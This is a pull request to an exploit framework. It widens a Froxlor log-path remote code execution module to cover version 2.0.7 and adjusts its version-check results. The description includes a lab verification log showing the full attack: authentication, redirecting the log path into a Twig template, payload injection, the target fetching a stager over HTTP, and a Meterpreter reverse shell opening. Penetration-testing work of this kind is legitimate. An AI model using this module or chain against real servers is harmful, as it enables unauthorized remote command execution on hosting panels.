### PR TITLE
Froxlor 2.0.7 is actually vulnerable too

### DIFF
--- a/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md
+++ b/documentation/modules/exploit/linux/http/froxlor_log_path_rce.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-Froxlor is an open source web hosting control panel. Froxlor v2.0.6 and below suffers from a bug that allows
+Froxlor is an open source web hosting control panel. Froxlor v2.0.7 and below suffers from a bug that allows
 authenticated users to change the application logs path to any directory on the OS level which the user www-data can
 write without restrictions from the backend which leads to writing a malicious Twig template that the application will
 render. That will lead to achieving a remote command execution under the user www-data.

--- a/modules/exploits/linux/http/froxlor_log_path_rce.rb
+++ b/modules/exploits/linux/http/froxlor_log_path_rce.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Froxlor Log Path RCE',
         'Description' => %q{
-          Froxlor v2.0.6 and below suffer from a bug that allows authenticated users to change the application logs path
+          Froxlor v2.0.7 and below suffer from a bug that allows authenticated users to change the application logs path
           to any directory on the OS level which the user www-data can write without restrictions from the backend which
           leads to writing a malicious Twig template that the application will render. That will lead to achieving a
           remote command execution under the user www-data.
@@ -119,8 +119,10 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       version = res.get_html_document.at('body/span/text()')
       if version
-        if Rex::Version.new('2.0.6') >= Rex::Version.new(version)
+        if Rex::Version.new('2.0.7') >= Rex::Version.new(version)
           Exploit::CheckCode::Appears("Vulnerable version found: #{version}")
+        else
+          Exploit::CheckCode::Safe("Non-vulnerable version found: #{version}")
         end
       else
         Exploit::CheckCode::Detected("Failed to obtain Froxlor version info from #{normalize_uri(target_uri.path, version_url)}")

--- a/modules/exploits/linux/http/froxlor_log_path_rce.rb
+++ b/modules/exploits/linux/http/froxlor_log_path_rce.rb
@@ -125,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
           Exploit::CheckCode::Safe("Non-vulnerable version found: #{version}")
         end
       else
-        Exploit::CheckCode::Detected("Failed to obtain Froxlor version info from #{normalize_uri(target_uri.path, version_url)}")
+        Exploit::CheckCode::Unknown("Failed to obtain Froxlor version info from #{normalize_uri(target_uri.path, version_url)}")
       end
     end
   end


### PR DESCRIPTION
I was working off of the PoC which mentioned versions 2.0.6 and prior were vulnerable and forgot to double check with the source to determine when the vuln was actually patched. Version 2.0.7 was released with the vulnerability included before it was patched in 2.0.8.

## Verification

I set up a 2.0.7 instance quick to double check everything worked as expected:
```
msf6 exploit(linux/http/froxlor_log_path_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Successful login
[+] The target appears to be vulnerable. Vulnerable version found: 2.0.7
[+] CSRF token is : 9acfc22e96e183a6ae2cd0eab36d68953afda810
[+] Changed logfile path to: /var/www/html/froxlor/templates/Froxlor/footer.html.twig
[*] Using URL: http://172.16.199.1:8080/ZFZLloWT
[+] Injected payload successfully
[*] Changing log path back to default value while triggering payload: /var/www/html/froxlor/logs/froxlor.log
[*] Client 172.16.199.140 (Wget/1.20.3 (linux-gnu)) requested /ZFZLloWT
[*] Sending payload to 172.16.199.140 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045348 bytes) to 172.16.199.140
[*] Deleting tampered footer.html.twig file
[*] Rewriting clean footer.html.twig file
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.140:42326) at 2023-02-24 13:17:21 -0500
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

meterpreter >
```